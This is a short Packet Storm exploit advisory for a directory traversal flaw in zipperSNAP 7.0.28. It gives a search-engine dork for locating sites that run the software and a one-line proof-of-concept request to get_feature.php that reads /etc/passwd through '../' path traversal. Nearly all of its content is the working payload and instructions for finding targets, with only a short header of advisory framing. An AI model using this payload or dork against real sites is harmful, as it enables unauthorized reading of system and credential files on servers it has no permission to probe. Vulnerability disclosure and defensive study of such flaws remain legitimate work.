zipperSNAP 7.0.28 Directory Traversal

2019-04-01T00:00:00
ID PACKETSTORM:152312
Type packetstorm
Reporter indoushka
Modified 2019-04-01T00:00:00

Description

                                        
                                            `====================================================================================================================================  
| # Title : zipperSNAP 7.0.28 Directory traversal Vulnerability |  
| # Author : indoushka |  
| # Telegram : @indoushka |  
| # Tested on : windows 10 Français V.(Pro) |  
| # Vendor : https://zippersnap.com/ |   
| # Dork : "site design by zipperSNAP 7.0.29" |  
====================================================================================================================================  
  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine   
  
[+] in search box use payload : /scp/get_feature.php?file=../../../../../../../../../../etc/passwd  
  
[+] http://127.0.0.1/scp/get_feature.php?file=../../../../../../../../../../etc/passwd  
  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |  
|  
=======================================================================================================================================  
`